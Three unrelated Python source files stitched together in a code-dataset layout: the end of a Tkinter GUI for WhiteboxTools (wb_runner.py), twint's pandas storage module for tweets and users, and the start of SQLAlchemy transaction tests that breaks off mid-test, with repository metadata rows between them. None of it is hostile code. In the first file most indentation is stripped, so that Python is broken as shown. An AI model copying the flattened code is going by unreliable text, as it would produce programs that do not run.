self.search_frame.grid(row = 1, column = 0, sticky=tk.NSEW)
self.search_label.grid(row = 0, column = 0, sticky=tk.NW)
self.search_bar.grid(row = 0, column = 1, sticky=tk.NE)
self.search_results_listbox.grid(row = 1, column = 0, columnspan = 2, sticky=tk.NSEW, pady = 5)
self.search_scroll.grid(row=1, column=2, sticky=(tk.N, tk.S))
#Configure rows and columns of the frame
self.search_frame.columnconfigure(0, weight=1)
self.search_frame.columnconfigure(1, weight=10)
        self.search_frame.columnconfigure(2, weight=1)
self.search_frame.rowconfigure(0, weight=1)
self.search_frame.rowconfigure(1, weight = 10)
#########################################################
# Current Tool Frame #
#########################################################
#Create the elements of the current tool frame
self.current_tool_frame = ttk.Frame(overall_frame, padding='0.01i')
self.current_tool_lbl = ttk.Label(self.current_tool_frame, text="Current Tool: {}".format(self.tool_name), justify=tk.LEFT) # , font=("Helvetica", 12, "bold")
self.view_code_button = ttk.Button(self.current_tool_frame, text="View Code", width=12, command=self.view_code)
#Define layout of the frame
self.view_code_button.grid(row=0, column=1, sticky=tk.E)
self.current_tool_lbl.grid(row=0, column=0, sticky=tk.W)
self.current_tool_frame.grid(row=0, column=0, columnspan = 2, sticky=tk.NSEW)
#Configure rows and columns of the frame
self.current_tool_frame.columnconfigure(0, weight=1)
self.current_tool_frame.columnconfigure(1, weight=1)
#########################################################
# Args Frame #
#########################################################
# #Create the elements of the tool arguments frame
# self.arg_scroll = ttk.Scrollbar(overall_frame, orient='vertical')
# self.arg_canvas = tk.Canvas(overall_frame, bd=0, highlightthickness=0, yscrollcommand=self.arg_scroll.set)
# self.arg_scroll.config(command=self.arg_canvas.yview) #self.arg_scroll scrolls over self.arg_canvas
# self.arg_scroll_frame = ttk.Frame(self.arg_canvas) # create a frame inside the self.arg_canvas which will be scrolled with it
# self.arg_scroll_frame_id = self.arg_canvas.create_window(0, 0, window=self.arg_scroll_frame, anchor="nw")
# #Define layout of the frame
# self.arg_scroll.grid(row = 1, column = 1, sticky = (tk.NS, tk.E))
# self.arg_canvas.grid(row = 1, column = 0, sticky = tk.NSEW)
# # reset the view
# self.arg_canvas.xview_moveto(0)
# self.arg_canvas.yview_moveto(0)
# #Add bindings
# self.arg_scroll_frame.bind('<Configure>', self.configure_arg_scroll_frame)
# self.arg_canvas.bind('<Configure>', self.configure_arg_canvas)
self.arg_scroll_frame = ttk.Frame(overall_frame, padding='0.0i')
self.arg_scroll_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.arg_scroll_frame.columnconfigure(0, weight=1)
#########################################################
# Buttons Frame #
#########################################################
#Create the elements of the buttons frame
buttons_frame = ttk.Frame(overall_frame, padding='0.1i')
self.run_button = ttk.Button(buttons_frame, text="Run", width=8, command=self.run_tool)
self.quit_button = ttk.Button(buttons_frame, text="Cancel", width=8, command=self.cancel_operation)
self.help_button = ttk.Button(buttons_frame, text="Help", width=8, command=self.tool_help_button)
#Define layout of the frame
self.run_button.grid(row=0, column=0)
self.quit_button.grid(row=0, column=1)
self.help_button.grid(row = 0, column = 2)
buttons_frame.grid(row=2, column=0, columnspan = 2, sticky=tk.E)
#########################################################
# Output Frame #
#########################################################
#Create the elements of the output frame
output_frame = ttk.Frame(overall_frame)
outlabel = ttk.Label(output_frame, text="Output:", justify=tk.LEFT)
self.out_text = ScrolledText(output_frame, width=63, height=15, wrap=tk.NONE, padx=7, pady=7, exportselection = 0)
output_scrollbar = ttk.Scrollbar(output_frame, orient=tk.HORIZONTAL, command = self.out_text.xview)
self.out_text['xscrollcommand'] = output_scrollbar.set
        #Retrieve and insert the text for the current tool
k = wbt.tool_help(self.tool_name)
self.out_text.insert(tk.END, k)
#Define layout of the frame
outlabel.grid(row=0, column=0, sticky=tk.NW)
self.out_text.grid(row=1, column=0, sticky=tk.NSEW)
output_frame.grid(row=3, column=0, columnspan = 2, sticky=(tk.NS, tk.E))
output_scrollbar.grid(row=2, column=0, sticky=(tk.W, tk.E))
#Configure rows and columns of the frame
self.out_text.columnconfigure(0, weight=1)
output_frame.columnconfigure(0, weight=1)
# Add the binding
if _platform == "darwin":
self.out_text.bind("<Command-Key-a>", self.select_all)
else:
self.out_text.bind("<Control-Key-a>", self.select_all)
#########################################################
# Progress Frame #
#########################################################
#Create the elements of the progress frame
progress_frame = ttk.Frame(overall_frame, padding='0.1i')
self.progress_label = ttk.Label(progress_frame, text="Progress:", justify=tk.LEFT)
self.progress_var = tk.DoubleVar()
self.progress = ttk.Progressbar(progress_frame, orient="horizontal", variable=self.progress_var, length=200, maximum=100)
#Define layout of the frame
self.progress_label.grid(row=0, column=0, sticky=tk.E, padx=5)
self.progress.grid(row=0, column=1, sticky=tk.E)
progress_frame.grid(row=4, column=0, columnspan = 2, sticky=tk.SE)
#########################################################
# Tool Selection #
#########################################################
# Select the appropriate tool, if specified, otherwise the first tool
self.tool_tree.focus(self.tool_name)
self.tool_tree.selection_set(self.tool_name)
self.tool_tree.event_generate("<<TreeviewSelect>>")
#########################################################
# Menus #
#########################################################
menubar = tk.Menu(self)
self.filemenu = tk.Menu(menubar, tearoff=0)
self.filemenu.add_command(label="Set Working Directory", command=self.set_directory)
self.filemenu.add_command(label="Locate WhiteboxTools exe", command=self.select_exe)
self.filemenu.add_command(label="Refresh Tools", command=self.refresh_tools)
wbt.set_compress_rasters(True)
self.filemenu.add_command(label="Do Not Compress Output TIFFs", command=self.update_compress)
self.filemenu.add_separator()
self.filemenu.add_command(label="Exit", command=self.quit)
menubar.add_cascade(label="File", menu=self.filemenu)
editmenu = tk.Menu(menubar, tearoff=0)
editmenu.add_command(label="Cut", command=lambda: self.focus_get().event_generate("<<Cut>>"))
editmenu.add_command(label="Copy", command=lambda: self.focus_get().event_generate("<<Copy>>"))
editmenu.add_command(label="Paste", command=lambda: self.focus_get().event_generate("<<Paste>>"))
menubar.add_cascade(label="Edit ", menu=editmenu)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About", command=self.help)
helpmenu.add_command(label="License", command=self.license)
menubar.add_cascade(label="Help ", menu=helpmenu)
self.master.config(menu=menubar)
def update_compress(self):
if wbt.get_compress_rasters():
wbt.set_compress_rasters(False)
self.filemenu.entryconfig(3, label = "Compress Output TIFFs")
else:
wbt.set_compress_rasters(True)
self.filemenu.entryconfig(3, label = "Do Not Compress Output TIFFs")
def get_toolboxes(self):
toolboxes = set()
for item in wbt.toolbox().splitlines(): # run wbt.toolbox with no tool specified--returns all
if item:
tb = item.split(":")[1].strip()
toolboxes.add(tb)
return sorted(toolboxes)
def sort_toolboxes(self):
self.upper_toolboxes = []
self.lower_toolboxes = []
for toolbox in self.toolbox_list:
if toolbox.find('/') == (-1): #Does not contain a subtoolbox, i.e. does not contain '/'
self.upper_toolboxes.append(toolbox) #add to both upper toolbox list and lower toolbox list
self.lower_toolboxes.append(toolbox)
else: #Contains a subtoolbox
self.lower_toolboxes.append(toolbox) #add to only the lower toolbox list
self.upper_toolboxes = sorted(self.upper_toolboxes) #sort both lists alphabetically
self.lower_toolboxes = sorted(self.lower_toolboxes)
def sort_tools_by_toolbox(self):
self.sorted_tools = [[] for i in range(len(self.lower_toolboxes))] #One list for each lower toolbox
count = 1
for toolAndToolbox in self.tools_and_toolboxes.split('\n'):
if toolAndToolbox.strip():
tool = toolAndToolbox.strip().split(':')[0].strip().replace("TIN", "Tin").replace("KS", "Ks").replace("FD", "Fd") #current tool
itemToolbox = toolAndToolbox.strip().split(':')[1].strip() #current toolbox
index = 0
for toolbox in self.lower_toolboxes: #find which toolbox the current tool belongs to
if toolbox == itemToolbox:
self.sorted_tools[index].append(tool) #add current tool to list at appropriate index
break
index = index + 1
count = count + 1
def get_tools_list(self):
self.tools_list = []
selected_item = -1
for item in wbt.list_tools().keys():
if item:
value = to_camelcase(item).replace("TIN", "Tin").replace("KS", "Ks").replace("FD", "Fd") #format tool name
self.tools_list.append(value) #add tool to list
                if item == self.tool_name: #update selected_item if tool found
selected_item = len(self.tools_list) - 1
if selected_item == -1: #set self.tool_name as default tool
selected_item = 0
self.tool_name = self.tools_list[0]
def tree_update_tool_help(self, event): # read selection when tool selected from treeview then call self.update_tool_help
curItem = self.tool_tree.focus()
self.tool_name = self.tool_tree.item(curItem).get('text').replace(" ", "")
self.update_tool_help()
def search_update_tool_help(self, event): # read selection when tool selected from search results then call self.update_tool_help
selection = self.search_results_listbox.curselection()
self.tool_name = self.search_results_listbox.get(selection[0])
self.update_tool_help()
def update_tool_help(self):
self.out_text.delete('1.0', tk.END)
for widget in self.arg_scroll_frame.winfo_children():
widget.destroy()
k = wbt.tool_help(self.tool_name)
self.print_to_output(k)
# print(wbt.license(self.tool_name).lower())
if "proprietary" in wbt.license(self.tool_name).lower():
self.view_code_button["state"] = "disabled"
else:
self.view_code_button["state"] = "enabled"
j = json.loads(wbt.tool_parameters(self.tool_name))
param_num = 0
for p in j['parameters']:
json_str = json.dumps(
p, sort_keys=True, indent=2, separators=(',', ': '))
pt = p['parameter_type']
if 'ExistingFileOrFloat' in pt:
ff = FileOrFloat(json_str, self, self.arg_scroll_frame)
ff.grid(row=param_num, column=0, sticky=tk.NSEW)
param_num = param_num + 1
elif ('ExistingFile' in pt or 'NewFile' in pt or 'Directory' in pt):
fs = FileSelector(json_str, self, self.arg_scroll_frame)
fs.grid(row=param_num, column=0, sticky=tk.NSEW)
param_num = param_num + 1
elif 'FileList' in pt:
b = MultifileSelector(json_str, self, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.W)
param_num = param_num + 1
elif 'Boolean' in pt:
b = BooleanInput(json_str, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.W)
param_num = param_num + 1
elif 'OptionList' in pt:
b = OptionsInput(json_str, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.W)
param_num = param_num + 1
elif ('Float' in pt or 'Integer' in pt or
'String' in pt or 'StringOrNumber' in pt or
'StringList' in pt or 'VectorAttributeField' in pt):
b = DataInput(json_str, self.arg_scroll_frame)
b.grid(row=param_num, column=0, sticky=tk.NSEW)
param_num = param_num + 1
else:
messagebox.showinfo(
"Error", "Unsupported parameter type: {}.".format(pt))
self.update_args_box()
self.out_text.see("%d.%d" % (1, 0))
def update_toolbox_icon(self, event):
curItem = self.tool_tree.focus()
        item_dict = self.tool_tree.item(curItem) #retrieve the treeview item for the selected toolbox
        self.toolbox_name = item_dict.get('text').replace(" ", "") #delete the space between the icon and text
        self.toolbox_open = item_dict.get('open') #retrieve whether the toolbox is open or not
if self.toolbox_open == True: #set image accordingly
self.tool_tree.item(self.toolbox_name, image = self.open_toolbox_icon)
else:
self.tool_tree.item(self.toolbox_name, image = self.closed_toolbox_icon)
def update_search(self, event):
self.search_list = []
self.search_string = self.search_text.get().lower()
self.search_results_listbox.delete(0, 'end') #empty the search results
num_results = 0
for tool in self.tools_list: #search tool names
toolLower = tool.lower()
if toolLower.find(self.search_string) != (-1): #search string found within tool name
num_results = num_results + 1
self.search_results_listbox.insert(num_results, tool) #tool added to listbox and to search results string
self.search_list.append(tool)
index = 0
self.get_descriptions()
for description in self.descriptionList: #search tool descriptions
descriptionLower = description.lower()
if descriptionLower.find(self.search_string) != (-1): #search string found within tool description
found = 0
for item in self.search_list: # check if this tool is already in the listbox
if self.tools_list[index] == item:
found = 1
if found == 0: # add to listbox
num_results = num_results + 1
self.search_results_listbox.insert(num_results, self.tools_list[index]) #tool added to listbox and to search results string
index = index + 1
self.search_frame['text'] = "{} Tools Found".format(num_results) #update search label
def get_descriptions(self):
self.descriptionList = []
tools = wbt.list_tools()
toolsItems = tools.items()
for t in toolsItems:
self.descriptionList.append(t[1]) #second entry in tool dictionary is the description
# def configure_arg_scroll_frame(self, event):
# # update the scrollbars to match the size of the inner frame
# size = (self.arg_scroll_frame.winfo_reqwidth(), self.arg_scroll_frame.winfo_reqheight())
# self.arg_canvas.config(scrollregion="0 0 %s %s" % size)
# if self.arg_scroll_frame.winfo_reqwidth() != self.arg_canvas.winfo_width():
# # update the canvas's width to fit the inner frame
# self.arg_canvas.config(width=self.arg_scroll_frame.winfo_reqwidth())
# def configure_arg_canvas(self, event):
# if self.arg_scroll_frame.winfo_reqwidth() != self.arg_canvas.winfo_width():
# # update the inner frame's width to fill the canvas
# self.arg_canvas.itemconfigure(self.arg_scroll_frame_id, width=self.arg_canvas.winfo_width())
def tool_help_button(self):
index = 0
found = False
#find toolbox corresponding to the current tool
for toolbox in self.lower_toolboxes:
for tool in self.sorted_tools[index]:
if tool == self.tool_name:
self.toolbox_name = toolbox
found = True
break
if found:
break
index = index + 1
#change LiDAR to Lidar
if index == 10:
self.toolbox_name = to_camelcase(self.toolbox_name)
#format subtoolboxes as for URLs
self.toolbox_name = self.camel_to_snake(self.toolbox_name).replace('/', '').replace(' ', '')
#open the user manual section for the current tool
webbrowser.open_new_tab("https://jblindsay.github.io/wbt_book/available_tools/" + self.toolbox_name + ".html#" + self.tool_name)
def camel_to_snake(self, s): # taken from tools_info.py
_underscorer1 = re.compile(r'(.)([A-Z][a-z]+)')
_underscorer2 = re.compile('([a-z0-9])([A-Z])')
subbed = _underscorer1.sub(r'\1_\2', s)
return _underscorer2.sub(r'\1_\2', subbed).lower()
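    # Illustrative behaviour of camel_to_snake (derived from the two regex
    # substitutions above rather than from a captured run):
    #   "StreamNetworkAnalysis" -> "stream_network_analysis"
    #   "LidarTools"            -> "lidar_tools"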
def refresh_tools(self):
#refresh lists
self.tools_and_toolboxes = wbt.toolbox('')
self.sort_tools_by_toolbox()
self.get_tools_list()
#clear self.tool_tree
self.tool_tree.delete(*self.tool_tree.get_children())
#Add toolboxes and tools to treeview
index = 0
for toolbox in self.lower_toolboxes:
if toolbox.find('/') != (-1): #toolboxes
self.tool_tree.insert(toolbox[:toolbox.find('/')], 0, text = " " + toolbox[toolbox.find('/') + 1:], iid = toolbox[toolbox.find('/') + 1:], tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within toolbox
self.tool_tree.insert(toolbox[toolbox.find('/') + 1:], 'end', text = " " + tool, tags = 'tool', iid = tool, image = self.tool_icon)
else: #subtoolboxes
self.tool_tree.insert('', 'end', text = " " + toolbox, iid = toolbox, tags = 'toolbox', image = self.closed_toolbox_icon)
for tool in self.sorted_tools[index]: #add tools within subtoolbox
self.tool_tree.insert(toolbox, 'end', text = " " + tool, iid = tool, tags = 'tool', image = self.tool_icon)
index = index + 1
#Update label
self.tools_frame["text"] = "{} Available Tools".format(len(self.tools_list))
#########################################################
# Functions (original) #
#########################################################
def help(self):
self.print_to_output(wbt.version())
def license(self):
self.print_to_output(wbt.license())
def set_directory(self):
try:
self.working_dir =filedialog.askdirectory(initialdir=self.working_dir)
wbt.set_working_dir(self.working_dir)
except:
messagebox.showinfo(
"Warning", "Could not set the working directory.")
def select_exe(self):
try:
filename = filedialog.askopenfilename(initialdir=self.exe_path)
self.exe_path = path.dirname(path.abspath(filename))
wbt.set_whitebox_dir(self.exe_path)
self.refresh_tools()
except:
messagebox.showinfo(
"Warning", "Could not find WhiteboxTools executable file.")
def run_tool(self):
# wd_str = self.wd.get_value()
wbt.set_working_dir(self.working_dir)
# args = shlex.split(self.args_value.get())
args = []
for widget in self.arg_scroll_frame.winfo_children():
v = widget.get_value()
if v:
args.append(v)
elif not widget.optional:
messagebox.showinfo(
"Error", "Non-optional tool parameter not specified.")
return
self.print_line_to_output("")
# self.print_line_to_output("Tool arguments:{}".format(args))
# self.print_line_to_output("")
# Run the tool and check the return value for an error
if wbt.run_tool(self.tool_name, args, self.custom_callback) == 1:
print("Error running {}".format(self.tool_name))
else:
self.run_button["text"] = "Run"
self.progress_var.set(0)
self.progress_label['text'] = "Progress:"
self.progress.update_idletasks()
def print_to_output(self, value):
self.out_text.insert(tk.END, value)
self.out_text.see(tk.END)
def print_line_to_output(self, value):
self.out_text.insert(tk.END, value + "\n")
self.out_text.see(tk.END)
def cancel_operation(self):
wbt.cancel_op = True
self.print_line_to_output("Cancelling operation...")
self.progress.update_idletasks()
def view_code(self):
webbrowser.open_new_tab(wbt.view_code(self.tool_name).strip())
def update_args_box(self):
s = ""
self.current_tool_lbl['text'] = "Current Tool: {}".format(
self.tool_name)
# self.spacer['width'] = width=(35-len(self.tool_name))
for item in wbt.tool_help(self.tool_name).splitlines():
if item.startswith("-"):
k = item.split(" ")
if "--" in k[1]:
value = k[1].replace(",", "")
else:
value = k[0].replace(",", "")
if "flag" in item.lower():
s = s + value + " "
else:
if "file" in item.lower():
s = s + value + "='{}' "
else:
s = s + value + "={} "
# self.args_value.set(s.strip())
def custom_callback(self, value):
''' A custom callback for dealing with tool output.
'''
if "%" in value:
try:
str_array = value.split(" ")
label = value.replace(
str_array[len(str_array) - 1], "").strip()
progress = float(
str_array[len(str_array) - 1].replace("%", "").strip())
self.progress_var.set(int(progress))
self.progress_label['text'] = label
except ValueError as e:
print("Problem converting parsed data into number: ", e)
except Exception as e:
print(e)
else:
self.print_line_to_output(value)
self.update() # this is needed for cancelling and updating the progress bar
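    # Sketch of the progress parsing above, assuming tools emit lines that end
    # with a percentage token:
    #   value = "Performing analysis: 43%"
    #   -> label "Performing analysis:" and the progress bar set to 43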
def select_all(self, event):
self.out_text.tag_add(tk.SEL, "1.0", tk.END)
self.out_text.mark_set(tk.INSERT, "1.0")
self.out_text.see(tk.INSERT)
return 'break'
class JsonPayload(object):
def __init__(self, j):
self.__dict__ = json.loads(j)
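# Usage sketch: the runner can be started bare or with a tool name as the first
# command-line argument ("Slope" is only an illustrative tool name):
#   python3 wb_runner.py
#   python3 wb_runner.py Slope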
def main():
tool_name = None
if len(sys.argv) > 1:
tool_name = str(sys.argv[1])
wbr = WbRunner(tool_name)
wbr.mainloop()
if __name__ == '__main__':
    main()
| 44.054805 | 207 | 0.551235 | [
"MIT"
] | luzpaz/whitebox-tools | wb_runner.py | 58,681 | Python |
import datetime, pandas as pd, warnings
from time import strftime, localtime
from twint.tweet import Tweet_formats
Tweets_df = None
Follow_df = None
User_df = None
_object_blocks = {
"tweet": [],
"user": [],
"following": [],
"followers": []
}
weekdays = {
"Monday": 1,
"Tuesday": 2,
"Wednesday": 3,
"Thursday": 4,
"Friday": 5,
"Saturday": 6,
"Sunday": 7,
}
_type = ""
def _concat(df, _type):
if df is None:
df = pd.DataFrame(_object_blocks[_type])
else:
_df = pd.DataFrame(_object_blocks[_type])
df = pd.concat([df, _df], sort=True)
return df
def _autoget(_type):
global Tweets_df
global Follow_df
global User_df
if _type == "tweet":
Tweets_df = _concat(Tweets_df, _type)
elif _type == "followers" or _type == "following":
Follow_df = _concat(Follow_df, _type)
elif _type == "user":
User_df = _concat(User_df, _type)
else:
error("[x] Wrong type of object passed")
def update(object, config):
global _type
#try:
# _type = ((object.__class__.__name__ == "tweet")*"tweet" +
# (object.__class__.__name__ == "user")*"user")
#except AttributeError:
# _type = config.Following*"following" + config.Followers*"followers"
if object.__class__.__name__ == "tweet":
_type = "tweet"
elif object.__class__.__name__ == "user":
_type = "user"
elif object.__class__.__name__ == "dict":
_type = config.Following*"following" + config.Followers*"followers"
if _type == "tweet":
Tweet = object
if 'Naoaianeia a?aiy (ceia)' in Tweet.datetime:
Tweet.datetime = Tweet.datetime[:19]
try:
datetime_ms = datetime.datetime.strptime(Tweet.datetime, Tweet_formats['datetime']).timestamp() * 1000
except:
datetime_ms = datetime.datetime.strptime(Tweet.datetime, '%Y-%m-%d %H:%M:%S').timestamp() * 1000
day = weekdays[strftime("%A", localtime(datetime_ms/1000))]
dt = f"{object.datestamp} {object.timestamp}"
_data = {
"id": str(Tweet.id),
"conversation_id": Tweet.conversation_id,
"created_at": datetime_ms,
"date": dt,
"timezone": Tweet.timezone,
"place": Tweet.place,
"tweet": Tweet.tweet,
"language": Tweet.lang,
"hashtags": Tweet.hashtags,
"cashtags": Tweet.cashtags,
"user_id": Tweet.user_id,
"user_id_str": Tweet.user_id_str,
"username": Tweet.username,
"name": Tweet.name,
"day": day,
"hour": strftime("%H", localtime(datetime_ms/1000)),
"link": Tweet.link,
"urls": Tweet.urls,
"photos": Tweet.photos,
"video": Tweet.video,
"thumbnail": Tweet.thumbnail,
"retweet": Tweet.retweet,
"nlikes": int(Tweet.likes_count),
"nreplies": int(Tweet.replies_count),
"nretweets": int(Tweet.retweets_count),
"quote_url": Tweet.quote_url,
"search": str(config.Search),
"near": Tweet.near,
"geo": Tweet.geo,
"source": Tweet.source,
"user_rt_id": Tweet.user_rt_id,
"user_rt": Tweet.user_rt,
"retweet_id": Tweet.retweet_id,
"reply_to": Tweet.reply_to,
"retweet_date": Tweet.retweet_date,
"translate": Tweet.translate,
"trans_src": Tweet.trans_src,
"trans_dest": Tweet.trans_dest
}
_object_blocks[_type].append(_data)
elif _type == "user":
user = object
try:
background_image = user.background_image
except:
background_image = ""
_data = {
"id": user.id,
"name": user.name,
"username": user.username,
"bio": user.bio,
"url": user.url,
"join_datetime": user.join_date + " " + user.join_time,
"join_date": user.join_date,
"join_time": user.join_time,
"tweets": user.tweets,
"location": user.location,
"following": user.following,
"followers": user.followers,
"likes": user.likes,
"media": user.media_count,
"private": user.is_private,
"verified": user.is_verified,
"avatar": user.avatar,
"background_image": background_image,
}
_object_blocks[_type].append(_data)
elif _type == "followers" or _type == "following":
_data = {
config.Following*"following" + config.Followers*"followers" :
{config.Username: object[_type]}
}
_object_blocks[_type] = _data
else:
print("Wrong type of object passed!")
def clean():
global Tweets_df
global Follow_df
global User_df
_object_blocks["tweet"].clear()
_object_blocks["following"].clear()
_object_blocks["followers"].clear()
_object_blocks["user"].clear()
Tweets_df = None
Follow_df = None
User_df = None
def save(_filename, _dataframe, **options):
if options.get("dataname"):
_dataname = options.get("dataname")
else:
_dataname = "twint"
if not options.get("type"):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_store = pd.HDFStore(_filename + ".h5")
_store[_dataname] = _dataframe
_store.close()
elif options.get("type") == "Pickle":
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_dataframe.to_pickle(_filename + ".pkl")
else:
print("""Please specify: filename, DataFrame, DataFrame name and type
(HDF5, default, or Pickle)""")
def read(_filename, **options):
if not options.get("dataname"):
_dataname = "twint"
else:
_dataname = options.get("dataname")
if not options.get("type"):
_store = pd.HDFStore(_filename + ".h5")
_df = _store[_dataname]
return _df
elif options.get("type") == "Pickle":
_df = pd.read_pickle(_filename + ".pkl")
return _df
else:
        print("""Please specify: DataFrame, DataFrame name (twint as default),
                filename and type (HDF5, default, or Pickle)""")
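# A minimal, hypothetical usage sketch of the save()/read() helpers above; the filename
# "example_tweets" and the demo frame are illustrative only, not part of the library.
if __name__ == "__main__":
    _demo = pd.DataFrame({"id": ["1", "2"], "tweet": ["hello", "world"]})
    save("example_tweets", _demo, type="Pickle")
    print(read("example_tweets", type="Pickle").head())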
| 32.20297 | 114 | 0.558493 | [
"MIT"
] | hellpanderrr/twint | twint/storage/panda.py | 6,505 | Python |
import sys
from sqlalchemy import create_engine
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import INT
from sqlalchemy import MetaData
from sqlalchemy import pool as _pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy import util
from sqlalchemy import VARCHAR
from sqlalchemy.engine import base
from sqlalchemy.engine import characteristics
from sqlalchemy.engine import default
from sqlalchemy.engine import url
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_warnings
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
class TransactionTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True),
Column("user_name", VARCHAR(20)),
test_needs_acid=True,
)
@testing.fixture
def local_connection(self):
with testing.db.connect() as conn:
yield conn
def test_commits(self, local_connection):
users = self.tables.users
connection = local_connection
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
transaction.commit()
transaction = connection.begin()
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.commit()
transaction = connection.begin()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 3
transaction.commit()
connection.close()
def test_rollback(self, local_connection):
"""test a basic rollback"""
users = self.tables.users
connection = local_connection
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
transaction.rollback()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 0
def test_raise(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
try:
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=1, user_name="user3")
transaction.commit()
assert False
except Exception as e:
print("Exception: ", e)
transaction.rollback()
result = connection.exec_driver_sql("select * from users")
assert len(result.fetchall()) == 0
def test_deactivated_warning_ctxmanager(self, local_connection):
with expect_warnings(
"transaction already deassociated from connection"
):
with local_connection.begin() as trans:
trans.rollback()
@testing.requires.savepoints
def test_deactivated_savepoint_warning_ctxmanager(self, local_connection):
with expect_warnings(
"nested transaction already deassociated from connection"
):
with local_connection.begin():
with local_connection.begin_nested() as savepoint:
savepoint.rollback()
def test_commit_fails_flat(self, local_connection):
connection = local_connection
t1 = connection.begin()
with mock.patch.object(
connection,
"_commit_impl",
mock.Mock(side_effect=exc.DBAPIError("failure", None, None, None)),
):
assert_raises_message(exc.DBAPIError, r"failure", t1.commit)
assert not t1.is_active
t1.rollback() # no error
def test_commit_fails_ctxmanager(self, local_connection):
connection = local_connection
transaction = [None]
def go():
with mock.patch.object(
connection,
"_commit_impl",
mock.Mock(
side_effect=exc.DBAPIError("failure", None, None, None)
),
):
with connection.begin() as t1:
transaction[0] = t1
assert_raises_message(exc.DBAPIError, r"failure", go)
t1 = transaction[0]
assert not t1.is_active
with expect_warnings(
"transaction already deassociated from connection"
):
t1.rollback() # no error
@testing.requires.savepoints_w_release
def test_savepoint_rollback_fails_flat(self, local_connection):
connection = local_connection
t1 = connection.begin()
s1 = connection.begin_nested()
# force the "commit" of the savepoint that occurs
# when the "with" block fails, e.g.
# the RELEASE, to fail, because the savepoint is already
# released.
connection.dialect.do_release_savepoint(connection, s1._savepoint)
assert_raises_message(
exc.DBAPIError, r".*SQL\:.*ROLLBACK TO SAVEPOINT", s1.rollback
)
assert not s1.is_active
with testing.expect_warnings("nested transaction already"):
s1.rollback() # no error (though it warns)
t1.commit() # no error
@testing.requires.savepoints_w_release
def test_savepoint_release_fails_flat(self):
with testing.db.connect() as connection:
t1 = connection.begin()
s1 = connection.begin_nested()
# force the "commit" of the savepoint that occurs
# when the "with" block fails, e.g.
# the RELEASE, to fail, because the savepoint is already
# released.
connection.dialect.do_release_savepoint(connection, s1._savepoint)
assert_raises_message(
exc.DBAPIError, r".*SQL\:.*RELEASE SAVEPOINT", s1.commit
)
assert not s1.is_active
s1.rollback() # no error. prior to 1.4 this would try to rollback
t1.commit() # no error
@testing.requires.savepoints_w_release
def test_savepoint_release_fails_ctxmanager(self, local_connection):
connection = local_connection
connection.begin()
savepoint = [None]
def go():
with connection.begin_nested() as sp:
savepoint[0] = sp
# force the "commit" of the savepoint that occurs
# when the "with" block fails, e.g.
# the RELEASE, to fail, because the savepoint is already
# released.
connection.dialect.do_release_savepoint(
connection, sp._savepoint
)
# prior to SQLAlchemy 1.4, the above release would fail
# and then the savepoint would try to rollback, and that failed
# also, causing a long exception chain that under Python 2
# was particularly hard to diagnose, leading to issue
# #2696 which eventually impacted Openstack, and we
# had to add warnings that show what the "context" for an
# exception was. The SQL for the exception was
# ROLLBACK TO SAVEPOINT, and up the exception chain would be
# the RELEASE failing.
#
# now, when the savepoint "commit" fails, it sets itself as
# inactive. so it does not try to rollback and it cleans
# itself out appropriately.
#
exc_ = assert_raises_message(
exc.DBAPIError, r".*SQL\:.*RELEASE SAVEPOINT", go
)
savepoint = savepoint[0]
assert not savepoint.is_active
if util.py3k:
# ensure cause comes from the DBAPI
assert isinstance(exc_.__cause__, testing.db.dialect.dbapi.Error)
def test_retains_through_options(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
conn2 = connection.execution_options(dummy=True)
conn2.execute(users.insert(), user_id=2, user_name="user2")
transaction.rollback()
eq_(
connection.exec_driver_sql("select count(*) from users").scalar(),
0,
)
def test_with_interface(self, local_connection):
connection = local_connection
users = self.tables.users
trans = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
try:
connection.execute(users.insert(), user_id=2, user_name="user2.5")
except Exception:
trans.__exit__(*sys.exc_info())
assert not trans.is_active
self.assert_(
connection.exec_driver_sql(
"select count(*) from " "users"
).scalar()
== 0
)
trans = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
trans.__exit__(None, None, None)
assert not trans.is_active
self.assert_(
connection.exec_driver_sql(
"select count(*) from " "users"
).scalar()
== 1
)
def test_close(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
connection.execute(users.insert(), user_id=1, user_name="user1")
connection.execute(users.insert(), user_id=2, user_name="user2")
connection.execute(users.insert(), user_id=3, user_name="user3")
assert connection.in_transaction()
transaction.commit()
assert not connection.in_transaction()
result = connection.exec_driver_sql("select * from users")
eq_(len(result.fetchall()), 3)
def test_close2(self, local_connection):
connection = local_connection
users = self.tables.users
transaction = connection.begin()
